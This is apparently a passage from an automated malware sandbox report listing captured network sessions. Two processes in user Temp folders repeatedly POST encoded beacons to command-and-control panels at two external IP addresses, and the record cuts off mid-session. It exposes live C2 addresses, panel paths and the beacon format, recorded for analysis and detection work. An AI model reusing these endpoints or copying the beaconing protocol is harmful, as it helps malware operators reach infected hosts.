                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
475 | 192.168.2.5 | 50319 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:09.912117958 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:10.160268068 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
476 | 192.168.2.5 | 50320 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:10.172388077 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:10.421458006 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
477 | 192.168.2.5 | 50321 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:10.525193930 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:10.773844004 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
478 | 192.168.2.5 | 50322 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:10.774523973 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:11.020555019 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
479 | 192.168.2.5 | 50323 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:11.020083904 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:11.265017986 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
480 | 192.168.2.5 | 50324 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:11.272608042 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:11.522196054 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
481 | 192.168.2.5 | 50325 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:11.621469975 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:11.869721889 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      482192.168.2.550326193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:11.910315990 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:12.161250114 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
483 | 192.168.2.5 | 50327 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:12.121473074 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:12.374320030 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
484 | 192.168.2.5 | 50328 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:12.409400940 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:12.657777071 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
485 | 192.168.2.5 | 50329 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:12.727643013 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:12.975064039 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
486 | 192.168.2.5 | 50330 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:13.022244930 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:13.266134024 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
487 | 192.168.2.5 | 50331 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:13.226464987 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:13.478275061 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
488 | 192.168.2.5 | 50332 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:13.508459091 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:13.750515938 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
489 | 192.168.2.5 | 50333 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:13.839209080 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:14.083681107 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
490 | 192.168.2.5 | 50334 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:14.115251064 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:14.359792948 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
491 | 192.168.2.5 | 50335 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:14.331918955 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:14.581792116 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
492 | 192.168.2.5 | 50336 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:14.611100912 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:14.862996101 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
